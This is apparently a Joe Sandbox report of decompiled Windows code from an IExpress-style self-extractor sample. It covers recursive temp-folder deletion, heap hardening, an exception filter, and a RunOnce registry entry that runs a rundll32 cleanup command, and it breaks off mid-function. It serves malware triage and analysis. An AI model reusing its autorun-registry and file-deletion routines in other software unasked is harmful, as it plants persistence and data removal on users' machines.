                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-1002207402
                                                                                                                                                                                                        • Opcode ID: e6fc8df0a4533ffc64e0233fd3f0f2023d3c50e37e574ad03e4bf717d41e43fb
                                                                                                                                                                                                        • Instruction ID: 95d96beb5cb4843c7acc51ec99bb78238dc33a0c8cb41ed65154e02c827e73eb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6fc8df0a4533ffc64e0233fd3f0f2023d3c50e37e574ad03e4bf717d41e43fb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7041D532A006099BDB30AB719C49F6A33E8EB58B55F4040EDF945D3192EF74CE80CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00BC2390(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                        				_t21 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                        				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                        				_t65 = __ecx;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_pop(_t62);
                                                                                                                                                                                                        					_pop(_t66);
                                                                                                                                                                                                        					_pop(_t46);
                                                                                                                                                                                                        					return E00BC6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00BC1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                        					_t58 = 0x104;
                                                                                                                                                                                                        					E00BC16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                        					_t63 = _t22;
                                                                                                                                                                                                        					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t58 = 0x104;
                                                                                                                                                                                                        						E00BC1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                        							_t58 = 0x104;
                                                                                                                                                                                                        							E00BC16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                        							DeleteFileA( &_v280);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                        								E00BC16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                        								_t58 = 0x104;
                                                                                                                                                                                                        								E00BC658A( &_v280, 0x104, 0xbc1140);
                                                                                                                                                                                                        								E00BC2390( &_v284);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                        					} while (_t36 != 0);
                                                                                                                                                                                                        					FindClose(_t63); // executed
                                                                                                                                                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,00BC8A3A,00BC11F4,00BC8A3A,00000000,?,?), ref: 00BC23F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00BC11F8), ref: 00BC2427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00BC11FC), ref: 00BC243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00BC2495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BC24A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00BC24AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 00BC24BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(00BC8A3A), ref: 00BC24C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
• Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: 2d3ebd1a4bbe52eb108f313b213e6606518fe6241ec17bd4b01b0c097d7e1580
                                                                                                                                                                                                        • Instruction ID: 1a4f79c5680d68a8bf32536695fdf74e8f0cde2de04db8403120d222406c9cf7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d3ebd1a4bbe52eb108f313b213e6606518fe6241ec17bd4b01b0c097d7e1580
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F3181316046449BD324EBA8CC89FEB73ECAFC9345F044D6DB59593291EF3499098762
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E00BC2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t7;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				struct HINSTANCE__* _t12;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				signed char _t19;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t17 = _t21;
                                                                                                                                                                                                        							 *0xbca288(0, 1, 0, 0);
                                                                                                                                                                                                        							 *_t21();
                                                                                                                                                                                                        							_t29 = _t24 - _t24;
                                                                                                                                                                                                        							if(_t24 != _t24) {
                                                                                                                                                                                                        								_t17 = 4;
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t20 = _a12;
                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                        				 *0xbc9124 = 0;
                                                                                                                                                                                                        				if(E00BC2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                        					_t9 = E00BC2F1D(_t18, _t20); // executed
                                                                                                                                                                                                        					_t22 = _t9; // executed
                                                                                                                                                                                                        					E00BC52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                                        						_t32 =  *0xbc8a3a; // 0x0
                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                        							_t19 =  *0xbc9a2c; // 0x0
                                                                                                                                                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                        								E00BC1F90(_t19, _t21, _t22);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t6 =  *0xbc8588; // 0x0
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 =  *0xbc9124; // 0x0
                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00BC6BB0,00BC0000,00000000,00000002,0000000A), ref: 00BC2C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00BC6BB0,00BC0000,00000000,00000002,0000000A), ref: 00BC2C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00BC2C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00BC6BB0,00BC0000,00000000,00000002,0000000A), ref: 00BC2C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: b9695f4bffba929761f01ad33ba11467d2e39de3e616cb962fe6ab5002b788af
                                                                                                                                                                                                        • Instruction ID: ee8330c990177def4320b5bbff4d521298b26b7c5a79f93f4867d1e76c94012f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9695f4bffba929761f01ad33ba11467d2e39de3e616cb962fe6ab5002b788af
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8111A171200709ABDB207BB5AC89F6F37E9EB8C794B0804ADF956EB251DE31DC418671
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC6F40() {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E00BC6EF0); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x00bc6f45
                                                                                                                                                                                                        0x00bc6f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00BC6F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: 1dae81d8f56bf25d79ef3d28fbd7a899cadf63df0390e6d3af661eb6f1ec09ec
                                                                                                                                                                                                        • Instruction ID: 2fd9d4b5370813d9b50521aab1e432e8d4fc72a2b534f86afc8a785ea1d5222c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1dae81d8f56bf25d79ef3d28fbd7a899cadf63df0390e6d3af661eb6f1ec09ec
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C69002742511054797101B709D19D1576D15A4E606B8654A5A111D54A4DF6050405513
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00BC202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                        				int _v536;
                                                                                                                                                                                                        				int _v540;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				struct HINSTANCE__* _t46;
                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				void _t56;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t79 = __edx;
                                                                                                                                                                                                        				_t28 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                        				_t84 = 0x104;
                                                                                                                                                                                                        				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                        				_t95 = _t94 + 0x18;
                                                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                        					return E00BC6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(_t86);
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E00BC171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                        					_t95 = _t95 + 0x10;
                                                                                                                                                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t87 = _t87 + 1;
                                                                                                                                                                                                        					if(_t87 < 0xc8) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t87 != 0xc8) {
                                                                                                                                                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                        					_t79 = _t84;
                                                                                                                                                                                                        					E00BC658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                        					_t84 = _t46;
                                                                                                                                                                                                        					if(_t84 == 0) {
                                                                                                                                                                                                        						L10:
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xbc9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        							L17:
                                                                                                                                                                                                        							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							_pop(_t86);
                                                                                                                                                                                                        							goto L24;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						_t72 =  &_v268;
                                                                                                                                                                                                        						_t80 = _t72 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t49 =  *_t72;
                                                                                                                                                                                                        							_t72 = _t72 + 1;
                                                                                                                                                                                                        						} while (_t49 != 0);
                                                                                                                                                                                                        						_t73 = _t72 - _t80;
                                                                                                                                                                                                        						_t81 = 0xbc91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t50 =  *_t81;
                                                                                                                                                                                                        							_t81 = _t81 + 1;
                                                                                                                                                                                                        						} while (_t50 != 0);
                                                                                                                                                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xbc91e5;
                                                                                                                                                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xbc91e5);
                                                                                                                                                                                                        						if(_t90 != 0) {
                                                                                                                                                                                                        							 *0xbc8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								_t54 = "%s /D:%s";
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        							E00BC171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                        							_t75 = _t90;
                                                                                                                                                                                                        							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                        							_t79 = _t23;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t56 =  *_t75;
                                                                                                                                                                                                        								_t75 = _t75 + 1;
                                                                                                                                                                                                        							} while (_t56 != 0);
                                                                                                                                                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                        							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                        							RegCloseKey(_v532); // executed
                                                                                                                                                                                                        							_t36 = LocalFree(_t90);
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t79 = 0x4b5;
                                                                                                                                                                                                        						E00BC44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                        					FreeLibrary(_t84); // executed
                                                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        						E00BC658A( &_v268, 0x104, 0xbc1140);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        				 *0xbc8530 = _t66;
                                                                                                                                                                                                        				goto L23;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x00bc21b0
                                                                                                                                                                                                        0x00bc21b2
                                                                                                                                                                                                        0x00bc21b3
                                                                                                                                                                                                        0x00bc21bc
                                                                                                                                                                                                        0x00bc21c7
                                                                                                                                                                                                        0x00bc21cb
                                                                                                                                                                                                        0x00bc21f1
                                                                                                                                                                                                        0x00bc21f6
                                                                                                                                                                                                        0x00bc21fd
                                                                                                                                                                                                        0x00bc21ff
                                                                                                                                                                                                        0x00bc21ff
                                                                                                                                                                                                        0x00bc2204
                                                                                                                                                                                                        0x00bc2213
                                                                                                                                                                                                        0x00bc2218
                                                                                                                                                                                                        0x00bc221d
                                                                                                                                                                                                        0x00bc221d
                                                                                                                                                                                                        0x00bc2220
                                                                                                                                                                                                        0x00bc2220
                                                                                                                                                                                                        0x00bc2222
                                                                                                                                                                                                        0x00bc2223
                                                                                                                                                                                                        0x00bc2229
                                                                                                                                                                                                        0x00bc223d
                                                                                                                                                                                                        0x00bc2249
                                                                                                                                                                                                        0x00bc2250
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2250
                                                                                                                                                                                                        0x00bc21d2
                                                                                                                                                                                                        0x00bc21d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc21d9
                                                                                                                                                                                                        0x00bc213a
                                                                                                                                                                                                        0x00bc2141
                                                                                                                                                                                                        0x00bc2144
                                                                                                                                                                                                        0x00bc214c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2163
                                                                                                                                                                                                        0x00bc2172
                                                                                                                                                                                                        0x00bc2172
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2163
                                                                                                                                                                                                        0x00bc20ea
                                                                                                                                                                                                        0x00bc20f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC2050
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00BC208C
                                                                                                                                                                                                          • Part of subcall function 00BC171E: _vsnprintf.MSVCRT ref: 00BC1750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC20C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC20EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00BC2103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC2122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00BC2134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC2144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00BC215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC21C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC21E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00BC223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC2249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC2250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 178549006-2663108224
                                                                                                                                                                                                        • Opcode ID: a339ec66a3a566bed752fe520ec691e93b30073f0ea6b49aa8cb1311aa7ba2ad
                                                                                                                                                                                                        • Instruction ID: 329eda73cf4bdd0349549b82ddac4d078e6b9d5f875ab3f24ff54af07f2ab712
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a339ec66a3a566bed752fe520ec691e93b30073f0ea6b49aa8cb1311aa7ba2ad
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7351D371A40218ABDB20AB64DC4DFEB77ACEB59740F0401ECFA49F7151DE719E498A60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00BC55A0(void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v265;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t35;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				char _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                                        				CHAR* _t82;
